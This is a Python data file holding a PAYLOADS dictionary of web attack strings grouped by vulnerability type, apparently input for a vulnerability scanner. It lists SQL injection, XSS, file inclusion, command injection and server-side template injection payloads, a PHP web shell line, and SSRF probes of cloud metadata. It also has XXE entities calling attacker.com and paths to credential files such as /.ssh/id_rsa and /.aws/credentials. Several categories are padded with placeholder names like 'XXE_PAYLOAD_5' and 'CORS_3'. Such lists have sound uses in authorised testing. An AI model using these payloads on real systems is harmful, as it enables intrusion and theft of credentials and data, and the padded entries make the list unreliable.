PAYLOADS = {
    "SQLI": ["' OR 1=1--", "') OR '1'='1'--", "admin'--", "' UNION SELECT NULL,NULL,NULL--", "1' AND SLEEP(5)--", "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--", "extractvalue(1,concat(0x7e,(select @@version),0x7e))", "1\" OR \"1\"=\"1", "1' OR '1'='1' #", "1' OR '1'='1' /*"],
    "XSS": ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>", "javascript:alert(1)", "'\"><script>alert(1)</script>", "<details open ontoggle=alert(1)>", "<video><source onerror=alert(1)>", "<iframe src=\"javascript:alert(1)\">", "<math><mtext><option><annotation encoding=\"Overview\" src=\"javascript:alert(1)\">", "<body onload=alert(1)>"],
    "LFI": ["../../../../etc/passwd", "..\\..\\..\\..\\windows\\win.ini", "/etc/passwd%00", "....//....//etc/passwd", "php://filter/convert.base64-encode/resource=index.php", "/proc/self/environ", "/var/log/auth.log", "../../../../../../../../etc/passwd%00", "/etc/shadow", "/etc/group"],
    "RCE": ["; id", "| id", "`id`", "$(id)", "; system('id')", "<?php system($_GET['cmd']); ?>", "import os; os.system('id')", "exec('id')", "eval(base64_decode('aWQ='))", "os.popen('id').read()"],
    "SSRF": ["http://127.0.0.1:80", "http://localhost:22", "http://169.254.169.254/latest/meta-data/", "dict://127.0.0.1:6379/", "gopher://127.0.0.1:6379/_SET%20test%20success", "file:///etc/passwd", "http://0.0.0.0:80", "http://[::]:80", "http://127.1:80", "http://2130706433:80"],
    "XXE": ["<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>", "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"http://127.0.0.1:80\">]><root>&xxe;</root>", "<!DOCTYPE x [ <!ENTITY % a SYSTEM \"http://attacker.com/p.dtd\"> %a; ]>", "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", "XXE_PAYLOAD_5", "XXE_PAYLOAD_6", "XXE_PAYLOAD_7", "XXE_PAYLOAD_8", "XXE_PAYLOAD_9", "XXE_PAYLOAD_10"],
    "SSTI": ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "*{7*7}", "{{config}}", "{{self}}", "{{''.__class__.__mro__[1].__subclasses__()}}", "${{7*7}}", "[[7*7]]"],
    "COMMAND_INJECTION": ["& id", "&& id", "|| id", ";id", "\n id", "\r id", "|/usr/bin/id", "&/usr/bin/id", "&&/usr/bin/id", ";/usr/bin/id"],
    "PATH_TRAVERSAL": ["%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%252f..%252f..%252fetc%2fpasswd", "..%c0%af..%c0%af..%c0%afetc/passwd", "..%ef%bc%8e..%ef%bc%8e..%ef%bc%8eetc/passwd", "..%2f..%2f..%2fetc/passwd", "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", "..\\..\\..\\etc\\passwd", "..%5c..%5c..%5cetc/passwd", "....//....//....//etc/passwd", "....\\\\....\\\\....\\\\windows\\\\win.ini"],
    "CRLF": ["%0d%0aSet-Cookie:GHOST=SY1", "%0d%0aLocation: http://google.com", "%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert(1)</script>", "%0d%0aHTTP/1.1 200 OK", "CRLF_5", "CRLF_6", "CRLF_7", "CRLF_8", "CRLF_9", "CRLF_10"],
    "OPEN_REDIRECT": ["//google.com", "/\\google.com", "https:google.com", "http://google.com", "//attacker.com", "/%09/google.com", "/%5cgoogle.com", "/%2f%2fgoogle.com", "/%2f%5cgoogle.com", "//%2f%2fgoogle.com"],
    "CORS": ["Origin: http://attacker.com", "Access-Control-Allow-Origin: *", "CORS_3", "CORS_4", "CORS_5", "CORS_6", "CORS_7", "CORS_8", "CORS_9", "CORS_10"],
    "HOST_HEADER": ["Host: attacker.com", "X-Forwarded-Host: attacker.com", "HOST_HEADER_3", "HOST_HEADER_4", "HOST_HEADER_5", "HOST_HEADER_6", "HOST_HEADER_7", "HOST_HEADER_8", "HOST_HEADER_9", "HOST_HEADER_10"],
    "SENSITIVE_FILES": ["/.git/config", "/.env", "/config.php", "/web.config", "/.htaccess", "/.ssh/id_rsa", "/wp-config.php", "/backup.sql", "/dump.sql", "/.aws/credentials"],
    "DIRECTORY_LISTING": ["/", "/images/", "/uploads/", "/admin/", "/backup/", "/db/", "/logs/", "/temp/", "/src/", "/inc/"],
    "GIT_DISCLOSURE": ["/.git/", "/.git/HEAD", "/.git/config", "/.git/index", "/.git/logs/HEAD", "/.git/refs/heads/master", "/.git/objects/", "/.git/hooks/", "/.git/info/", "/.git/description"],
    "ENV_DISCLOSURE": ["/.env", "/.env.local", "/.env.dev", "/.env.production", "/.env.bak", "/.env.old", "/.env.example", "/.env.save", "/.env.txt", "/.env.php"],
    "BACKUP_FILES": ["/index.php.bak", "/index.php.old", "/index.php.save", "/index.php~", "/config.php.bak", "/config.php.old", "/db.sql.gz", "/db.tar.gz", "/backup.zip", "/www.zip"],
    "PHP_INFO": ["/phpinfo.php", "/info.php", "/test.php", "/i.php", "/pinfo.php", "/php.info", "/check.php", "/status.php", "/version.php", "/config.php"],
    "XXE_OOB": ["<!DOCTYPE r [<!ENTITY % y SYSTEM \"http://attacker.com/x\"> %y;]>", "XXE_OOB_2", "XXE_OOB_3", "XXE_OOB_4", "XXE_OOB_5", "XXE_OOB_6", "XXE_OOB_7", "XXE_OOB_8", "XXE_OOB_9", "XXE_OOB_10"]
}
VULN_TYPES = list(PAYLOADS.keys())
